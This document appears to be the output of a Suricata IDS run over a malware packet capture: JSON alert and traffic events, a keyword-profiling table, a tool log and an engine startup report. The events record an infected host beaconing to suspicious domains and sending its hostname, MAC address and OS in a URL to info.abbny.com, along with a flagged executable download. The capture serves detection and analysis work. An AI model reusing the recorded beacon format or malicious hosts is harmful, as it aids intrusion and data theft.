{"timestamp":"2019-03-29T09:47:38.930545+0000","flow_id":1142426567471536,"pcap_cnt":48,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/277_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1301013939907171,"pcap_cnt":52,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/281_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1142426567471536,"pcap_cnt":54,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/280_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:40.427087+0000","flow_id":1142426567471536,"pcap_cnt":63,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:49:10.060695+0000","flow_id":587005697649943,"pcap_cnt":85,"event_type":"dns","src_ip":"192.168.240.16","src_port":49331,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30006,"rrname":"v.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:10.079964+0000","flow_id":587005697649943,"pcap_cnt":86,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49331,"proto":"UDP","dns":{"type":"answer","id":30006,"rcode":"NOERROR","rrname":"v.beahh.com","rrtype":"A","ttl":10,"rdata":"27.102.107.137"}}
{"timestamp":"2019-03-29T09:49:10.689650+0000","flow_id":1395340017559293,"pcap_cnt":101,"event_type":"http","src_ip":"192.168.240.16","src_port":49427,"dest_ip":"27.102.107.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain"}}
{"timestamp":"2019-03-29T09:49:22.984973+0000","flow_id":1395340017559293,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"27.102.107.137","src_port":80,"dest_ip":"192.168.240.16","dest_port":49427,"proto":"TCP","http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6399},"app_proto":"http","fileinfo":{"filename":"\/vWORKGROUP","gaps":false,"state":"CLOSED","stored":false,"size":6399,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.426246+0000","flow_id":1142426567471536,"pcap_cnt":106,"event_type":"fileinfo","src_ip":"204.237.142.145","src_port":80,"dest_ip":"192.168.240.16","dest_port":49426,"proto":"TCP","http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9737},"app_proto":"http","fileinfo":{"filename":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","gaps":false,"state":"CLOSED","stored":false,"size":9737,"tx_id":2}}
{"timestamp":"2019-03-29T09:49:28.626953+0000","flow_id":1960437455819017,"pcap_cnt":110,"event_type":"dns","src_ip":"192.168.240.16","src_port":57392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54797,"rrname":"info.ackng.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1960437455819017,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"info.ackng.com"}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1960437455819017,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"ackng.com","rrtype":"SOA","ttl":23}}
{"timestamp":"2019-03-29T09:49:30.761257+0000","flow_id":1702486015122857,"pcap_cnt":112,"event_type":"dns","src_ip":"192.168.240.16","src_port":61488,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50892,"rrname":"ip.42.pl","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1702486015122857,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"ip.42.pl","rrtype":"CNAME","ttl":10460,"rdata":"42.pl"}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1702486015122857,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"42.pl","rrtype":"A","ttl":13904,"rdata":"79.98.145.42"}}
{"timestamp":"2019-03-29T09:49:34.063661+0000","flow_id":484862786992301,"pcap_cnt":114,"event_type":"dns","src_ip":"192.168.240.16","src_port":50151,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63584,"rrname":"info.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":484862786992301,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"info.beahh.com"}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":484862786992301,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"beahh.com","rrtype":"SOA","ttl":1067}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":1066328344161469,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":1066328344161469,"pcap_cnt":126,"event_type":"http","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:34.548857+0000","flow_id":1066328344161469,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"79.98.145.42","src_port":80,"dest_ip":"192.168.240.16","dest_port":49428,"proto":"TCP","http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/raw","gaps":false,"state":"CLOSED","stored":false,"size":13,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:32.799257+0000","flow_id":2143686530707993,"pcap_cnt":131,"event_type":"dns","src_ip":"192.168.240.16","src_port":50174,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41144,"rrname":"jsonip.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.267500+0000","flow_id":2143686530707993,"pcap_cnt":132,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50174,"proto":"UDP","dns":{"type":"answer","id":41144,"rcode":"NOERROR","rrname":"jsonip.com","rrtype":"A","ttl":280,"rdata":"45.79.77.20"}}
{"timestamp":"2019-03-29T09:49:36.269304+0000","flow_id":619544371534840,"pcap_cnt":134,"event_type":"dns","src_ip":"192.168.240.16","src_port":49762,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43817,"rrname":"info.abbny.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":1348125443758169,"pcap_cnt":141,"event_type":"alert","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.272085+0000","flow_id":1348125443758169,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.240.16","src_port":49429,"dest_ip":"45.79.77.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:36.274606+0000","flow_id":1348125443758169,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"45.79.77.20","src_port":80,"dest_ip":"192.168.240.16","dest_port":49429,"proto":"TCP","http":{"hostname":"jsonip.com","url":"\/","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"https:\/\/jsonip.com\/","length":194},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":194,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.352934+0000","flow_id":619544371534840,"pcap_cnt":144,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49762,"proto":"UDP","dns":{"type":"answer","id":43817,"rcode":"NOERROR","rrname":"info.abbny.com","rrtype":"A","ttl":21599,"rdata":"153.92.4.49"}}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1132157308266039,"pcap_cnt":155,"event_type":"alert","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:36.699781+0000","flow_id":1132157308266039,"pcap_cnt":155,"event_type":"http","src_ip":"192.168.240.16","src_port":49430,"dest_ip":"153.92.4.49","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png"}}
{"timestamp":"2019-03-29T09:49:36.712023+0000","flow_id":1132157308266039,"pcap_cnt":156,"event_type":"fileinfo","src_ip":"153.92.4.49","src_port":80,"dest_ip":"192.168.240.16","dest_port":49430,"proto":"TCP","http":{"hostname":"info.abbny.com","url":"\/e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0","http_user_agent":"Python-urllib\/2.7","http_content_type":"image\/png","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":259},"app_proto":"http","fileinfo":{"filename":"\/e.png","gaps":false,"state":"CLOSED","stored":false,"size":259,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.824279+0000","flow_id":1016128766765503,"pcap_cnt":164,"event_type":"tls","src_ip":"192.168.240.16","src_port":49431,"dest_ip":"45.79.77.20","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill","issuerdn":"C=US, ST=CA, L=San Francisco, O=Geuis, CN=Geuis Skill"}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2019-03-29T09:49:37.163101+0000","flow_id":1402439600033560,"pcap_cnt":180,"event_type":"alert","src_ip":"192.168.240.16","src_port":49432,"dest_ip":"27.102.130.126","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019714,"rev":10,"signature":"ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-03-29T09:49:37.297976+0000","flow_id":1402439600033560,"pcap_cnt":216,"event_type":"alert","src_ip":"27.102.130.126","src_port":

This file has been truncated.


keyword_perf.log - (16013 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 6/28/2019 -- 02:55:17
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            72167165        20483           20483           11628439        3523.00         3523.00         0.00           
  flow             86907169        26186           26186           4785354         3318.00         3318.00         0.00           
  threshold        70414884        20483           7               2635754         3437.00         5167.00         3437.00        
  content          43403496        3184            511             6564414         13631.00        40103.00        8571.00        
  pcre             545993          70              11              83441           7799.00         4543.00         8406.00        
  byte_test        294205          88              58              6077            3343.00         3439.00         3157.00        
  byte_jump        221808          67              25              5340            3310.00         3309.00         3311.00        
  isdataat         27478           9               1               3634            3053.00         3634.00         2980.00        
  flowbits         16232787        2871            73              6894325         5654.00         3344.00         5714.00        
  urilen           67512           21              8               4045            3214.00         3305.00         3158.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            72167165        20483           20483           11628439        3523.00         3523.00         0.00           
  flow             86907169        26186           26186           4785354         3318.00         3318.00         0.00           
  flowbits         16200790        2865            67              6894325         5654.00         3166.00         5714.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11224150        1261            159             137265          8900.00         9762.00         8776.00        
  pcre             279798          36              5               83441           7772.00         3651.00         8436.00        
  byte_test        286644          86              58              6077            3333.00         3439.00         3112.00        
  byte_jump        202189          61              19              5340            3314.00         3322.00         3311.00        
  isdataat         27478           9               1               3634            3053.00         3634.00         2980.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         31997           6               6               7534            5332.00         5332.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        70414884        20483           7               2635754         3437.00         5167.00         3437.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          361520          89              49              5509            4062.00         4039.00         4089.00        
  pcre             185308          26              4               24066           7127.00         4962.00         7520.00        
  urilen           67512           21              8               4045            3214.00         3305.00         3158.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7717            2               2               4740            3858.00         3858.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          108078          16              4               15643           6754.00         14965.00        4018.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          31303           9               0               4444            3478.00         0.00            3478.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          31157928        1677            214             6564414         18579.00        85710.00        8759.00        
  byte_test        7561            2               0               4244            3780.00         0.00            3780.00        
  byte_jump        19619           6               6               4752            3269.00         3269.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          270981          64              35              6261            4234.00         4429.00         3998.00        
  pcre             48053           5               1               11155           9610.00         6859.00         10298.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          111018          30              23              4792            3700.00         3740.00         3570.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_connection
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12723           4               0               3479            3180.00         0.00            3180.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6006            1               0               6006            6006.00         0.00            6006.00        
  pcre             20241           1               0               20241           20241.00        0.00            20241.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          33853           9               8               4404            3761.00         3837.00         3157.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          29341           8               4               4566            3667.00         3956.00         3379.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          38023           11              11              4224            3456.00         3456.00         0.00           
  pcre             12593           2               1               7578            6296.00         5015.00         7578.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3386            1               0               3386            3386.00         0.00            3386.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7469            2               2               4137            3734.00         3734.00         0.00           


IDSDeathBlossom.py.log - (1150 bytes)
2019-06-28 02:55:07,279 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-06-28 02:55:08,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-06-28 02:55:08,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2019-06-28 02:55:08,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-06-28 02:55:08,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-06-28 02:55:08,038 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df5d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/04032019.1339-network.pcap -vvv -k none
2019-06-28 02:55:17,627 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-06-28 02:55:17,627 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 10.3582279682


suricata-report-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (18074 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df5d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/04032019.1339-network.pcap -vvv -k none
elapsedtime:9.586991
stderr:
stdout:
28/6/2019 -- 02:55:08 - <Info> - Configuration node 'rule-files' redefined.
28/6/2019 -- 02:55:08 - <Notice> - This is Suricata version 4.0.0 RELEASE
28/6/2019 -- 02:55:08 - <Info> - CPUs/cores online: 1
28/6/2019 -- 02:55:08 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31513 and 'request-body-inspect-window' set to 16746 after randomization.
28/6/2019 -- 02:55:08 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32323 and 'response-body-inspect-window' set to 16656 after randomization.
28/6/2019 -- 02:55:08 - <Config> - DNS request flood protection level: 500
28/6/2019 -- 02:55:08 - <Config> - DNS per flow memcap (state-memcap): 524288
28/6/2019 -- 02:55:08 - <Config> - DNS global memcap: 16777216
28/6/2019 -- 02:55:08 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
28/6/2019 -- 02:55:08 - <Config> - preallocated 1000 hosts of size 136
28/6/2019 -- 02:55:08 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
28/6/2019 -- 02:55:08 - <Config> - using magic-file /usr/share/file/magic
28/6/2019 -- 02:55:08 - <Config> - Core dump size is unlimited.
28/6/2019 -- 02:55:08 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
28/6/2019 -- 02:55:08 - <Config> - preallocated 1000 defrag trackers of size 168
28/6/2019 -- 02:55:08 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
28/6/2019 -- 02:55:08 - <Config> - stream "prealloc-sessions": 2048 (per thread)
28/6/2019 -- 02:55:08 - <Config> - stream "memcap": 33554432
28/6/2019 -- 02:55:08 - <Config> - stream "midstream" session pickups: disabled
28/6/2019 -- 02:55:08 - <Config> - stream "async-oneside": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "checksum-validation": disabled
28/6/2019 -- 02:55:08 - <Config> - stream."inline": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "bypass": disabled
28/6/2019 -- 02:55:08 - <Config> - stream "max-synack-queued": 5
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "memcap": 134217728
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "depth": 0
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "toserver-chunk-size": 2534
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "toclient-chunk-size": 2631
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly.raw: enabled
28/6/2019 -- 02:55:08 - <Config> - stream.reassembly "segment-prealloc": 2048
28/6/2019 -- 02:55:08 - <Config> - Delayed detect disabled
28/6/2019 -- 02:55:08 - <Config> - pattern matchers: MPM: ac, SPM: bm
28/6/2019 -- 02:55:08 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
28/6/2019 -- 02:55:08 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
28/6/2019 -- 02:55:08 - <Config> - prefilter engines: MPM
28/6/2019 -- 02:55:08 - <Config> - IP reputation disabled
28/6/2019 -- 02:55:08 - <Perf> - Registered 148 keyword profiling counters.
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
28/6/2019 -- 02:55:08 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
28/6/2019 -- 02:55:09 - <Config> - No rules loaded from ET-emerging-icmp.rules.
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
28/6/2019 -- 02:55:09 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
28/6/2019 -- 02:55:10 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
